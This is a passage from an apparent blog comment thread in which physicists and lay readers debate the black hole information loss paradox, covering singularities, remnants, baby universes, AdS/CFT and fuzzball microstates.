squeeze it together to one point. Now one would expect from quantum gravitational effects that this can't happen, thus no infinite densities, thus no singularities. I think almost everybody expects that quantum gravity will take care of the singularities in classical general relativity. I just think that the relevance of that for resolving the information loss problem has not been reflected well in the literature. Many attempts focus on the problem of how to shove the information through the horizon. Which, when done before the final stage, necessitates locality violations. The difference to the bottle you are comparing the black hole to is that the region inside the horizon is indeed causally disconnected from the outside. Also, radiation can very well fall into a black hole, it just can't come out. I think the analogy to a one-way membrane is quite helpful in this regard. Best, Bee: I'm not going to get into the conservative versus not conservative issue, those are just words. In AdS/CFT we have a detailed understanding, backed up by a large body of calculations, demonstrating how apparent information loss comes about, how it is related to the horizon of the black hole (roughly, the infinite red shift makes the spectrum continuous), and how it is solved in the dual field theory which encodes all the fine details of the problems, neglected in GR. So, the situation has changed, and in my mind any other of the classic, well-known solutions to the problems has to be equally quantitative to earn my respect. Are there any new arguments for the "conservative" solutions, or at least new arguments against their well-known problems? But to one of your issues, how can anything happen at the horizon even if the curvatures are arbitrarily low. This is also well understood. In any quantum mechanical system with large degeneracies (as is typical for highly excited states), the following holds. If you calculate simple quantities, you in effect average over huge number of states, obtaining a thermodynamic averaged quantity. For those you can use perturbation theory, the effect of any perturbation on the level will be small. For detailed quantities like the correlations between macroscopic number of Hawking quanta, perturbation theory breaks down for arbitrarily small coupling. Same happen in this situation: for average thermodynamical quantities you can use GR, and to understand subtle issues to do with unitarity, quantum gravity is needed. Maybe it's because the existence of the horizon is what removes information from our universe. No horizon, no paradox. I am certainly not telling you what you are allowed to find paradoxical. But the horizon does not 'remove information from our universe' - it just avoids information can reach I^+, and as far as I am concerned not being able to access information in some region of spacetime is not particularly paradoxical. The problem is that if the black hole evaporates into purely thermal radiation, this region shrinks away and information does never come out (if radiation remained purely thermal that is). What is paradoxical is that blaming the loss of information on our lacking understanding of quantum gravity does not seem to be sufficient to solve the problem (for reasons that I am sure you are well aware of, explained in the above mentioned earlier post ). You could blame it on the singularity, but what's the point if singularities probably don't exist? The point we were making is that understanding the avoidance of singularities is necessary to solve the problem since it is actually the (classical) singularity where information gets finally destroyed. That does not mean it is sufficient though. The argument is simply as long as you have a singularity (in the sense defined) you have a problem. The horizon is only non-special for an observer already committed to passing through it - the free falling observer. For an observer capable of getting close and then retreating, it's a hell whose temperature (due to the Hawking effect) is asymptotic to infinity. Isn't that true? And if you'd have an observer with infinite acceleration in flat space he'd also see a hell of particles. So what's your point? Thanks for the link. I still don't see what this is good for. Does it help me to understand anything? Like, why are the masses of charged particles not continuous and have the values they have? Also, how do you get a solution with non-vanishing trace of the energy momentum tensor from stuffing EM fields into the bag? Best, I am sure you could answer all your questions if you would actually read the paper. I am not interested in fighting with you about terminology, but what you refer to as 'destruction' of information, is merely the event of it becoming unavailable to the observer at I^+. And yes, you are of course right, once you have crossed the event horizon you are stuck inside it, that's more or less the definition of horizon (which is also in the paper). Should the black hole remember that it once used to be large, and recall all the information from those good old times when it was large, and emit all the information from those old times? I am not sure what you mean with 'remember', but it simply stores everything that falls in, yes, from those old times. What if it had some life before it as well? Should it remember the state from the beginning of the Universe? It makes no sense. Things that don't make it inside the trapping horizon of course don't have to be stored. In our terminology the difference between baby universes and remnants is in their ADM mass. It's zero for the former, non-zero for the latter. But yes, they are related in that both are permanent and just keep the information. Ya okay, people have problems and use the horizon. Does it change the way the problem existed for them if they try and describe it another way? The Thing?:) The old version of string theory, pre-1995, had these first two features. It includes quantum mechanics and gravity, but the kinds of things we could calculate were pretty limited. All of a sudden in 1995, we learned how to calculate things when the interactions are strong. Suddenly we understood a lot about the theory. And so figuring out how to compute the entropy of black holes became a really obvious challenge. I, for one, felt it was incumbent upon the theory to give us a solution to the problem of computing the entropy, or it wasn't the right theory. Of course we were all gratified that it did.Black Holes and Beyond: Harvard's Andrew Strominger on String Theory Susskind presents the "Gedanken experiment" to summarize and bring us up to date. Of course, there is a lot history behind this. Does this understanding help too, "not cross paths with the singularity?" Maybe some might like the Klein bottle(rain drop) for a comparison then if it were ever the case that such an evolution to the singularity was just the "turning" inside out? :) Stefan… actually it was a coincidence, and from what you point out, a nice one. I don’t know anything about the mathematics of droplets, but it seems likely that there’d be a singularity, indeed. No, Dave did not talk about this, as far as I could tell. if the black hole were storing the information about all the matter that every fell into it, but were not losing this information as it evaporates, it would mean that such a black hole must be capable to store an arbitrarily high amount of information - it would have to accumulate everything that went into it, without losing it. Just think of a black hole that was absorbing and emitting matter for 5 billions years at the same rate. That would mean that pretty much arbitrarily small regions of space can carry arbitrarily high information. That's impossible - e.g. because the loop processes involving these new objects would always diverge. There are much less dramatic possibilities that can be easily excluded. For example, virtual effects of any remnants will drive Newton's constant to zero. Of course, in Matrix theory or the AdS/CFT, one can see that there are no remnants, no baby universes, and no unlimited storage of information in a black hole. But even if one chooses to ignore these "models" of quantum gravity as a qualitative template, the room to maneuvers is just incredibly constrained these days. Wow, I was at least assuming that your baby universes behaved as massive remnants for the exterior observers in the old Universe, too. Now you want the baby universes (that can carry all the information) to look like *massless* particles in the old Universe? That's really... bold. ;-) Infinitely many new massless particle species, right? Massless particles have a tremendous effects on physics. For example, massless bosons always cause long-range forces. You seem to be adding even more "conservative" (in your terminology - note how polite I am) items to your picture than what you have written in the article which is more incredible than before. I don't know. We actually haven't talked about that. I would be in favor of submitting it somewhere. However, as I also wrote in the post, the paper is a classification of solution attempts, not actually a new result. It's not the kind of paper I usually write, so not sure how difficult it would be to publish. It also serves its purpose well on the arxiv. Best, But to one of your issues, how can anything happen at the horizon even if the curvatures are arbitrarily low. This is also well understood. In any quantum mechanical system with large degeneracies (as is typical for highly excited states), the following holds. Why do I have highly excited states if the curvature is arbitrarily low? Best, I think it would really help if you would read the paper. Or at least my post. This would answer a lot of your questions, and save me a lot of time. if the black hole were storing the information about all the matter that every fell into it, but were not losing this information as it evaporates, it would mean that such a black hole must be capable to store an arbitrarily high amount of information - it would have to accumulate everything that went into it, without losing it. Just think of a black hole that was absorbing and emitting matter for 5 billions years at the same rate. Correct. That would mean that pretty much arbitrarily small regions of space can carry arbitrarily high information. They can have an arbitrarily large volume. That's impossible - e.g. because the loop processes involving these new objects would always diverge. If objects with an arbitrarily large volume would appear in loop-processes, which doesn't seem particularly plausible to me. But either way, the question of whether or not there can be an effective theory for such objects is discussed in the paper. Wow, I was at least assuming that your baby universes behaved as massive remnants for the exterior observers in the old Universe, too. Now you want the baby universes (that can carry all the information) to look like *massless* particles in the old Universe? That's really... bold. ;-) Infinitely many new massless particle species, right? Massless particles have a tremendous effects on physics. For example, massless bosons always cause long-range forces. You seem to be adding even more "conservative" (in your terminology - note how polite I am) items to your picture than what you have written in the article which is more incredible than before. No, these objects actually look like 'nothing' in the old universe. They have neither mass nor momentum, they are simply disconnected. From the viewpoint of an outside observer, a black hole is a state of an energy equaling its ADM mass. For large black holes this energy is large compared to the energy scale of fundamental excitation (the Planck mass). This is the origin of black hole thermodynamics, a generic highly excited state in a generic theory will have a thermodynamic description, as far as simple quantities are concerned. It is only when probing fine details that you need the microscopic description. To probe the microscopic details of any complicated system, black hole or gas in a room, you'd need to calculate very detailed quantity. For those detailed quantities perturbation theory tends to break down, at arbitrarily low couplings. This is a generic phenomena, so we should not be surprised that it is also true in the black hole context. BTW, what I was asking is whether the status of those conservative solutions has changed some in the last X years, where X could be your choice. I really don't know, those tend to be the solution favored by the relativity community. References would be appreciated. Not to put words in Moshe's mouth, but I think the trouble is that you don't seem to address the now standard and well-supported picture of the resolution of the information paradox. Namely, that Hawking radiation is not precisely thermal; there are correlations in the Hawking radiation which allow the information to escape, but they are small (e^-S, with S the black hole entropy), and don't show up in the semiclassical analysis. Everyone would agree that the singularity is a classical artifact, and that there is a well-defined nonsingular quantum evolution. The question is why is the semiclassical calculation misleading, and this is a question that can be asked entirely in the weak-curvature regime. The answer is that these small effects are not accounted for. The "highly excited state" we're concerned with here is the black hole itself, which has very high entropy; the classical analysis is coarse-graining all these states into one black hole, which is roughly speaking why it's giving you a thermal answer that overlooks the correlations. Why do I have highly excited states if the curvature is arbitrarily low? Well, black holes of a large mass are excited states because the more energy (=excitation) one adds to it, the more massive they become (by the mass conservation and by E=mc^2). More excited i.e. more massive black holes have a low curvature outside the horizon because this fact can be calculated from general relativity: the radius (of curvature or event horizon) scales like the mass in 4D (or a positive power in other dimensions). Time to return to Moshe's words. A very excited (massive) black holes has a large entropy i.e. many microstates. Averaging over them is a kind of thermodynamic limit that will represent the interior as being empty, even though the content of the BH interior depends on the microstate if one avoids the averaging. I've read your paper. Maybe the reason of my (and others') "opinions" about the black holes is different than not having read your paper? Just a speculative idea to consider! ;-) If the baby universes look like nothing and get disconnected, then they don't exist for the observers in the old Universe and the information, as compared in the information loss puzzles (which is always comparing information in the same Universe, before the BH creation, and after its evaporation) is lost or not lost in the same way as if the baby universes were not there at all. They are not there, after all, in this case. Such disconnected universes have no impact on the information loss or preservation. Yes, it is probably not so surprising that these solutions tend to be favoured by the GR community. As far as I know there hasn't been much work on that since the mid 90s, except for Steve Hsu's recent papers (see earlier post). I think you are making some assumptions as to what the microstates of the black hole do describe. Besides this I don't understand how what you say explains how, microscopically, the information from an infalling piece of matter (quantum state, whatever) gets transferred into the outgoing radiation? I really like the "baby universe" idea. The remnant in the parent universe could be a Planck mass black hole aka graviton 4-pair that effectively creates a deadend in spacetime (a discrete spacetime). The information of a Planck mass black hole could very well be the information for an instanton big bang like ours (a Paola Zizzi idea). Yeah, what you consider conservative depends strongly on your background. If you think the geometrical description of classical GR is complete, you'd tend to favor solutions where this structure describes the situations very far from where it was ever tested, e.g in the interior of black holes, even if this leads to results which look very strange from ordinary quantum mechanics viewpoint. I don't know in precise detail how the information is transferred to the Hawking radiation. Then again, I don't know that for ordinary process like burning a piece of coal, and I trust that QM is fine with those processes on much less detailed evidence. That much less detailed evidence pretty much exists already for black holes in AdS space, though it is still interesting to phrase it in the gravitational language. these questions about progress in other directions can be pretty quickly answered e.g. by Google Scholar. Take e.g. black hole remnants. You will see a 2001 paper (Adler) arguing that something must be left by a new uncertainty principle, but they don't say much about the spectrum of the left things (so it could be just one particle). Otherwise, there are a dozen of high-cited papers of the type "If there were remnants, we could see them, they could be.... dark matter or whatever", but none of these papers seems to contain any model or theoretical evidence that the remnant picture makes sense. You will find Bekenstein, Banks, Strominger etc. among the top-cited authors with the keyword, and you may know what they think today. Similarly, you can browse through the baby universe papers. You will probably know quite a few. The others will be very similar to the Sabine Lee paper, as far as the content goes. The most famous star-like, no-horizon, no-singularity paper to modify the picture is probably by Ashtekar and Bojowald. You may look at it whether it will convince you that it contains some new evidence for anything. I have personally no idea why they think that they allowed the things from the BH interior to escape, completely changing the diagram. I haven't read every word of the paper but it just looks wrong. These were the three "conservative" solutions and I am afraid that you won't find any better papers to support these "conservative" choices. So I guess that you will silently agree that the "preference" of these "conservative" solutions by a whole "relativistic community" is due to nothing else than zeal. I think the trouble is that you don't seem to address the now standard and well-supported picture of the resolution of the information paradox. Well, the thing about the information loss is that people like to argue about it and everybody has his or her favourite solution. You evidently don't like we haven't spend enough time in discussion the one you like best. Sorry about that. Besides this, same question to you as to Moshe: how does in that case, microscopically, the information get from the infalling to the outgoing particle at the horizon? One more comment for Moshe: note that if the "conservative" terminology depends on the background, the communities have been reverted. Clearly, the normal macroscopic Penrose diagram of a black hole is "conservative" for us because it actually follows from general relativity. It is very strange for a relativist to deny it and consider this denial of relativity "conservative" according to his upbringing. It would be more logical for him to argue that the diagram is correct and the information is simply lost, just like Hawking did, by causality. I think you are making some assumptions as to what the microstates of the black hole do describe. I thought that microstates of a black hole describe microscopic states of an object called a black hole. They're vectors in the Hilbert space and their precise dynamics is described by the dynamical laws of a theory - e.g. a Hamiltonian. We can also ask whether we should love them or imagine them but these aspects are not a part of real science, are they? Besides this I don't understand how what you say explains how, microscopically, the information from an infalling piece of matter (quantum state, whatever) gets transferred into the outgoing radiation? Any glowing object imprints the detailed information about the microstate into the radiation, and black hole is no different. The only reason that was thought to make it impossible was causality - the causal separation of the interior where the information was imagined to reside. But this causality turned out to be just an approximate feature arising from the averaging over all microstates. Individual microstates don't respect the causality, the "empty interior" picture of the black hole is not appropriate for them, and they get the information out in the very same way as a burning preprint. Well, the thing about the information loss is that people like to argue about it and everybody has his or her favourite solution. Has physics been reduced to sentiments and popularity polls, making the actual papers and evidence obsolete? That's very bad but fortunately in this particular case, the stringy picture wins, anyway. ;-) More excited i.e. more massive black holes have a low curvature outside the horizon because this fact can be calculated from general relativity: the radius (of curvature or event horizon) scales like the mass in 4D (or a positive power in other dimensions). Doesn't the curvature at the black hole horizon scale as M/R_h^3 ~ 1/M^2? Anyway, I certainly never questioned the curvature is low at the horizon. Time to return to Moshe's words. A very excited (massive) black holes has a large entropy i.e. many microstates. Averaging over them is a kind of thermodynamic limit that will represent the interior as being empty, even though the content of the BH interior depends on the microstate if one avoids the averaging. According to what theory? I've read your paper. Maybe the reason of my (and others') "opinions" about the black holes is different than not having read your paper? Just a speculative idea to consider! ;-) In this case it is very depressing you weren't able to extract from the paper that baby universes disconnect from the externally flat region, since this is basically their definition. Moreover, the fact that their volume can be arbitrarily large seems to have somehow escaped you, even though we have spend several pages discussing that point. If the baby universes look like nothing and get disconnected, then they don't exist for the observers in the old Universe and the information, as compared in the information loss puzzles (which is always comparing information in the same Universe, before the BH creation, and after its evaporation) is lost or not lost in the same way as if the baby universes were not there at all. They are not there, after all, in this case. Such disconnected universes have no impact on the information loss or preservation. The point is that the evolution is unitary if you take into account the baby universes. It just looks non-unitary to the observer in the asymptotically flat region, because he has no access to part of the space-time, which results in his quantum state being mixed. The important thing about the baby universes is not that they "are not there" in the final state ("there" presumably meaning connected to the asymptotic region) but that they were there in the initial stage, and information ends up in them. “Well, you don't need an infinite mass to create an infinite density. You just have to squeeze it together to one point” Yes I understood this before I said it, as I know that a point represents in theory as a place with proximity (location)yet of no physical size, which when considered as part of the whole equates to be what one gets when you divide something by zero. As I understand it in the mathematical perspective this has it to be undefined, rather the infinite. I certainly won’t belabor the point (no pun intended), yet I do see as significant to differentiate undefined from infinite, for the former I see as paradoxical and therein perhaps wrong, while the latter I see as a limit which defines the absolute boundaries that can be considered. So as opposed to a point, if as you and others have contended we are limited to a definable size, then to achieve infinite density would require infinite mass. I’m sure this along with other considerations is what lays at the heart as to why many are convinced that a singularity cannot exist. “Also, radiation can very well fall into a black hole, it just can't come out. I think the analogy to a one-way membrane is quite helpful in this regard” Yes as I said the analogy is crude, yet as you remind that by thinking about it as a Maxwell’s Demon does lend it this one way aspect. To be truthful I’m still hung up when information and (classical) entropy are taken as being one in the same, as the forner more relates to me as specific (meaningful) ordering and the latter the process that serves to eliminate any such distinction as the limit is random, which in effect leaves no backwards trail to follow other then to be able to say what was before was more ordered. This I find to be not merely trivial, yet deceptive as to opposed to what normally is imagined as what information truly constitutes as being. Anyway all this is truly interesting and as I can tell from the shear volume of post activity highly contested. Which ever way it turns out to be Black Holes and their implications certainly serve as a linch pin for future discovery. It is of little wonder why above all else one of the things that bothered Einstein the greatest is that his theory inevitably leads to such implications. In that regard I’m currently reading John Moffat’s new book “Reinventing gravity”. Perhaps this can offer additional thoughts on how the problem might be approached? Not that I would even consider such a challenge as I’m far from capable yet merely insatiably curious. By the way with all the comments I’m having difficulty being able to distinguish between “Peer Review” And “Peer Revile” :-) Sorry for the misunderstanding. You are right of course, if you can't squeeze matter into a point you need an infinite mass to get an infinite density. However, mathematically speaking infinities are nothing particularly worrisome. Infinity is a very well defined concept, one can deal with it very well. The worries with singularities are physical, not mathematical. What does it mean for something to be "really" infinite? Do such events exist? I don't know, honestly, but I think the general sense is that a singularity indicates the breakdown of the theory and signals that it has to be replaced by a more fundamental theory that can be trusted better. I didn't ready John's book. Let me know what you think if you are done! Dear Sabine, happily enough, we agree that in 4D, the radius scales like the mass so the curvature scales like 1/M^2. Do you still agree that for large (heavy) black holes, the curvature is small? I don't know exactly what positive thing you had in mind but you had an apparent difficulty with Moshe's description of black holes as highly excited states with low curvature. According to what theory? According to any theory of quantum gravity - but if you don't find any papers with that statement, you may interpret the statement as my discovery, work in progress. ;-) It is very easy to see that many microstates of a black hole don't have an empty interior. For example, when a spaceship just fell into the black hole, there is a spaceship inside the black hole, so it is not true that all black hole microstates are empty inside. On the other hand, having a spaceship in a black hole is a nontrivial condition that chooses non-generic black hole microstates. The generic states can't have any spaceships and they look contrived. For example, the "fuzzballs" (including LMN bubbles in AdS) give very nontrivial profiles for black hole microstates. All these subtleties go away with the averaging which must clearly generate translation invariant physics, even locally, because the whole "ensemble" of microstates is clearly invariant under these things, and the empty BH interior is the only dynamics one can get in this way. Again, yes, it is plausible that not many people realize that things work in this way, even in the "stringy culture", but they will surely agree when they sort it in their heads. Baby universes Again, if the Hawking radiation carries no information about the initial state, and the information is stored in some other Universe, then the definitions of the information loss problem say that the information has been lost. More precisely, it has been lost for the physical observer. That's also why the information loss problem wasn't a problem before Hawking discovered the radiation: one could always say that the information was inside. The problem only became physical once the black hole could disappear because one could no longer argue that the information is in it. If you want to count the information in some completely different, physically inaccessible universe as "stored" or "preserved", you may also equally safely save your money in banks in another Universe that has disconnected from ours. Happy saving, Iceland may be better, after all. Let me explain the "empty black hole from averaging" differently. If one waits for a while, complicated excited bound states get "thermalized" - one gets generic microstates or their mixture out of pretty much any initial state. With the spaceship in mind, we have another way to describe what the "waiting" means for the black hole. The black hole simply sucks everything that is already inside, flying towards the singularity. After some time, in some appropriate coordinates, all these things are swallowed by the singularity and the interior is emptied. Also, the quasinormal modes (vibrations of the shape etc.) exponentially drop almost to zero. The black hole becomes spherical and empty. Microscopically, we saw that it must be the same thing as getting a typical microstate - or the average over pretty much all of them. That's roughly why the average over microstates must be equivalent to the empty interior. (Black holes are the fastest thermalizers in the world.) The opposite statement, that non-averaged microstates are not empty inside, can be seen with the spaceship - or with the fuzzballs, if you wish. A lot of the confusion about the information loss was caused by incorrect identification here. People often thought that all microstates still looked empty, or that the "spaceship inside" carried additional degrees of freedom besides the black hole microstates. Of course, it can't. The black hole microstates count all possibility that can exist inside the [stretched] horizon, so they already contain all configurations of spaceships, too. Averaging means "empty interior", microstates are not empty and don't allow us to separate the interior from the outside world in the same way we do for empty black holes. (Generic BH microstates are much further from the empty BH than a BH with a spaceship.) You saythere are correlations in the Hawking radiation which allow the information to escape, but they are small (e^-S, with S the black hole entropy) I understand that this is the conventional string theory wisdom. But if the correlations are exponentially small, how can they possibly carry more than an exponentially small amount of information? Is this explained anywhere? It is an easy calculation that they need to carry a lot more information than e^-S if the information is to escape. This may depend on your definition of exponentially small, which is an incredibly vague term. Your commentIndividual microstates don't respect the causality, the "empty interior" picture of the black hole is not appropriate for them, and they get the information out in the very same way as a burning preprint. reminds me very much of the famous Sydney Harris cartoon. I think you be more explicit here in step two. Peter Shor: let us forget about black hole and try to find out what is the precise microstate of the air in your office. There are many ways to find out, all highly theoretical. They may involve making very detailed measurements, or finding very fine details (which are "exponentially small") of a few simple ones. Eventually you'd have to gain access to S bits of information, where S is the entropy of the system. This applies equally to the air in your office, or to the Hawking radiation emitted from BH. Lubos: thanks for the references, you'd see my opinion by what I choose to work on...while we are on the subject, I am wondering what is your preferred resolution of the paradox, as phrased in the gravitational language. the term "exponentially small correlations" may be vague in the blog thread above and you may want to keep it vague - but you don't have to, if you follow me! ;-) If you open Maldacena's 2001 paper, a favorite one of Moshe, it explains, see e.g. 5th line on page 14/20, that some correlations decrease exponentially fast. One can add an operator on a different - very separated and seemingly unimportant - boundary for similar exponential reasons but it is enough to restore unitarity, in a completely explicit way. This AdS eternal toy model has a different geometry than the Schwarzschild black hole in 4D but the problems and their solutions are morally isomorphic. You know, more generally (not related to Maldacena's paper directly), correlations may be exponentially small, but there are many types of correlators one can construct, and by combining them, they can carry sufficient information. Moshe: I thought everything I wrote above was about my preferred solution in the gravitational language. I just believe that the microstates are really similar to the fuzzball picture, i.e. very far from a black hole with an empty interior, and then it is like any other burning object. One can still imagine that the black hole is "mostly empty" inside, but this always assumes some averaging over microstates already. I agree with you. There can still be another picture that is consistent with all we say, like one based on black hole final state - but I doubt this particular one. The fuzzball-like constructions also suggest that non-BPS black holes probably have stringy modes in the "interior" excited, not being just SUGRA solutions, so I don't really believe that a "purely gravitational" description can carry all the necessary information (or degrees of freedom). What do you say, if you simplify your testimony relatively to things written above? ;-) Moshe and Lubos have already given answers, but just to be clear, you're right that for certain quantities a semiclassical, effective field theory sort of calculation will just be wrong by an order-one amount. But those are quantities that involve correlations among a large number of quanta of Hawking radiation. If you stick with a very simple quantity, like some two-point function, the corrections will be exponentially small. One can have some fun looking at N by N matrices and building simple toy quantum mechanics examples that illustrate such points.... One more clarification to Peter Shor: if you want to have a microscopic description of the air in your room, the easiest is to work in terms of the microscopic constituents. We have such an understanding of (Maldacena's version of )the information paradox for large black holes in AdS. However, the gravitational language is analogous to the thermodynamical description of the system. Describing the specific microscopic situation if you have access only to thermodynamic measurements is tough, because you tend to average over huge number of states. The information about the specific microscopic situation is encoded in exponentially small contributions to such average quantities. It is precisely because they are exponentially small that they carry a lot of information - there are a lots more possibilities to consider if you are more sensitive to fine detail. Just for the case that onymous is e.g. Joe Polchinski who would never dare to promote his own work, here is a relevant paper about the matrices as a toy model for black holes, Polchinski et al 2008. They show that at all orders in 1/N, probably analogous to orders in G_Newton, the information seems lost but it is preserved for finite N. Matrix quantum mechanics is popular as a toy model for BHs - and maybe more than toy model - elsewhere, too. Susskind et al. 2008 argue that BH, much like matrix models, are the fastest thermalizers. This link is no coincidence because matrix models is how states - and black holes are generic localized ones at an energy level - are described in Matrix theory. This paper by Susskind et al. suggests that the bits can "spread" over the horizon much like if all the possible links or synapses or what's the word between all the bits on the horizons existed - so the information on the horizon is stored like on an infinite-dimensional space, reducing a power-law growth of the thermalization time to a logarithm. The misunderstanding is principally of my doing as I sometimes imagine that others will naturally fill in the blanks. As for Moffat’s book I have not much to report as I’ve only just begun. What I find somewhat frustrating, primarily as it’s time consuming, is that despite being nothing more then a novice I’m forced to read through many chapters of things that I’ve been long since familiar; yet have no choice for fear I might miss some important detail if I skip further along to the meat of the matter. I can therefore only imagine how this must be for you and others who have this as their profession when picking up to read such a book. Perhaps like children’s toys there should be a couple versions written that would take this into consideration and so identified. At least for the pro this constitutes simply reading the authors latest and or most relevant papers. Then again, I really shouldn’t complain as Moffat is lending an opportunity for those like myself would not have if he considered such projects as being a waste of effort and in that sense not worthwhile. Okay, then to begin with the introduction, “In 1916 Einstein published his new theory of gravity called general relativity. In 1919 the theory was validated by the observation of the bending of light during a solar eclispse,………..” Hi Bee,"Like, why are the masses of charged particles not continuous and have the values they have?"It would be constant because it would be bounded by the "mouth" of bag. If the renmaints of the black holes are stable, they should be pretty much "static" objects. I have no idea of why these would be any leftover from the blackhole. After all, the tiniest black hole should be a really heavy particle and decay into a shower of particles as fast a planck time. But, by admiting it it is a stable particle, I suppose it would be pretty natural if any particle is also candidate for a residual black hole, and so, a bag of gold. This is, I think, another reasoning that would lead me to think that fermions have such nature. "Also, how do you get a solution with non-vanishing trace of the energy momentum tensor from stuffing EM fields into the bag?" I do not know whether anybody here said it already, but there is an easy way to see that the singularity is not the one to blame. There are examples of three dimensional black holes (in AdS3 space) which have no curvature singularity whatsoever (these object have an event horizon) and yet the paradox exists. Therefore, the story is not related to what Bee is trying to say, and all the attempts to associate the physics with the singularity can not hold water. It may be nice or sexy, but mathematically and physically we know it is wrong due to the existence (more than a decade) of counterexamples (the BTZ black holes). A line of argument that is complementary to that taken by you and Lee in your paper is that if a theory of quantum gravity eliminates the occurrence of actual physical singularities that can destroy information, then that theory also rules out 'radical' solutions to the information paradox such as black hole complementarity. Black hole complementarity, as proposed by Susskind and others for instance, depends on the existence of a real singularity at r = 0 that destroys the information carried by an object passing through the horizon. If that information is not so destroyed, the 'complementary' copy of the information encoded on the stretched horizon can be collected and passed through the horizon to be compared with the original version at some later time -- in violation of the strictures against quantum cloning. The existence of an actual singularity is thus crucial for the viability of black hole complementarity. However, the general expectation is that a realistic theory of quantum gravity will not contain such actual singularities. Your 'conservative' solutions to the information paradox would seem to be not just a less 'radical' option, but actually the only option if there are no actual spacetime singularities in quantum gravity. 1. AdS is totally, utterly different from the real world. I find it very easy to believe that the AdS/CFT explanation of the information problem is *correct* for AdS black holes.....and yet *utterly irrelevant* to the solution of the problem in the real world [and that goes double for the amazingly hyped BTZ black holes --- in 3 spacetime dimensions! "Leaving aside the fact that the asymptotics are radically wrong, and so is the dimension, the BTZ black hole is *exactly like* a real black hole...." Please.]. All we have seen contra this is statements using the word "morally". For all we know, as based on actual calculations, the correct statement could be: "Unitarity is preserved for black holes in AdS, but not in dS". I'm not saying I believe this, just that *nothing* that has been said here provides any evidence against this statement. Note that the distinction between large and small AdS black holes is irrelevant -- please bear in mind that black holes are intrinsically global objects. This observation leads me to..... [2] In 2005, George Chapline gave a talk about black holes at Harvard. Here is what Jacques Distler had to say about that: http://golem.ph.utexas.edu/~distler/blog/archives/000530.html I urge everyone to read that, and to consider replacing the name "George Chapline" by "Samir Mathur". OK, I admit that the comparison is not completely fair. But nor is it completely *unfair*.... [c] The Horowitz-Maldacena proposal recognises the obvious fact that the singularity [or whatever replaces it] is the only sensible place to put whatever weird stuff is going on, yet it preserves unitarity in the "ordinary", stringy way. It is "radical" in Bee+Lee's sense, but to my mind it is the most conservative solution of all. Thanks you for expanding the explanations of your work. Could you please elaborate on the folowing points: 1) what motivates the attitude towards maintaining unitarity through removing the singularity? While quantum physics is deeply linked to the concept of unitary evolution, non-equilibrium dynamics and non-equilibrium field theories are manifestly built on a non-unitary foundation. Why should one insist that equilibrium physics remains valid in strongly coupled gravitational regimes? 2) according to one of your earlier replies to my questions, astrophysical observations alone cannot settle the issue of where the BH entropy is coming from. Then how can one resolve the information paradox without having verifiable claims on the nature of BH entropy? 3) You conclude: "The sane thing to do is to stick with conservative options until we are sure it's a no-go. That requires in particular understanding the properties of Planck-sized quantum gravitational objects with high entropy." How can one ever hope to understand the physics of such "quantum gravitational objects" at the unreachable Planck scale? Isn'it wishful thinking? I am perfectly sure I never doubted, neither here nor anywhere else, that the curvature at the black hole horizon is small compared to the Planck scale for large black holes (ie with masses larger than the Planck mass). I have no clue what you are trying to say. Individual microstates don't respect the causality, the "empty interior" picture of the black hole is not appropriate for them [...] It is very easy to see that many microstates of a black hole don't have an empty interior. I don't know who or what you are arguing with, but I never said anything of the sort that the black hole interior is empty or whatever it is you are trying to say. I also don't know what it means for a microstate not to respect causality, what exactly do you mean with that? On the other hand, having a spaceship in a black hole is a nontrivial condition that chooses non-generic black hole microstates. The generic states can't have any spaceships and they look contrived. For example, the "fuzzballs" (including LMN bubbles in AdS) give very nontrivial profiles for black hole microstates. All these subtleties go away with the averaging which must clearly generate translation invariant physics, even locally, because the whole "ensemble" of microstates is clearly invariant under these things, and the empty BH interior is the only dynamics one can get in this way. Ah. And exactly how is this compatible with your above, correct, observation that what has crossed the horizon stays inside, and moreover can't even stay close by the horizon? I'm asking for a local dynamical explanation for what happens to the information. As far as I know fuzzballs create significant distortions of locality at horizon scales. Again, if the Hawking radiation carries no information about the initial state, and the information is stored in some other Universe, then the definitions of the information loss problem say that the information has been lost. More precisely, it has been lost for the physical observer. Correct, it has been lost for the physical observer in the asymptotically flat region. The point is however that the evolution remains unitary if you take into acount the full endstate, which includes the disconnected part. I personally don't think that's such a particularly compelling scenario, but it's certainly a possibility. That's also why the information loss problem wasn't a problem before Hawking discovered the radiation: one could always say that the information was inside. The problem only became physical once the black hole could disappear because one could no longer argue that the information is in it. There are examples of three dimensional black holes (in AdS3 space) which have no curvature singularity whatsoever (these object have an event horizon) and yet the paradox exists. Therefore, the story is not related to what Bee is trying to say, and all the attempts to associate the physics with the singularity can not hold water. Your argument is a non-starter. A) I was explicitly not referring to curvature singularities, but more importantly B) I wasn't saying if you don't have a singularity, you don't have a problem. I said as long as you have a singularity, you certainly have a problem. If you want to provide a counterexample, you'd have to find a case with singularity but without paradox, and not a case without singularity but with paradox. Just another off the wall thought (or more likely a stupid question)and that is if as in quantum physics all that should be considered as being information is the wave function, then everything that follows is simply what manifests as a result: in other words what evolves. So the space required to hold a single wave function would not be very great, although necessarily less then zero (a point). The question then is to ask, if this evolution is then deterministic or not? Standard quantum theory insists that it’s not, thus what is referred to as information is then arbitrary (and therefore trivial), while if it is considered as deterministic it then is significant (yet not fundamental in itself). It is then of course further required to discover if the wave function is fundamental in its beginnings and description or itself arbitrary. I find it strange then that when physics searches for a TOE in attempting to simplify, while insisting that nature itself is denied the same, as it’s required to preserve every insignificant aspect. Is this then to be considered reductionism or redundantism ? ;-) Pope: nobody is claiming the dS and AdS are in any way similar. The large black holes in AdS are actually very different from that in flat space, in that they are eternal. The point is that in that context one can make precisely the same arguments that Hawking makes for information loss, and see that they fail, and precisely how. Yes, it is a logical possibility that those arguments somehow fail in AdS (with arbitrarily low cosmological constant) but are still valid in flat space or dS space. It is a matter of personal taste if you regard such attitude as keeping your head in the sand, or being conservative and cautious. One feature of the information paradox in the eternal context is that the singularity is always spacelike separated from an external observer. So, without macroscopic violations of causality you can do whatever you like at the singularity, it will have precisely zero effect on the information paradox. In flat space there is a small possibility the singularity becomes relevant at late times, this possibility is eliminated in the eternal case. They study the CGHS model and show in detail that the singularities in black holes are eliminated by quantum effects and the evolution completely unitary. This is a PRL, more details are coming in a long paper, some of which were discussed in a recent talk: http://pirsa.org/08120016/. There has also been a lot of progress showing that the singularity is eliminated in homogeneous models of black hole interiors. See, for example, papers by Leonardo Modesto: There are other papers in this domain, for example, Ashtekar and Bojowald, which we cite. I might mention also that the literature on elimination of cosmological singularities in homogeneous models is now very large, for a recent review see Parampreet Singh , Are loop quantum cosmos never singular?, arXiv:0901.2750. My view is that these papers together greatly 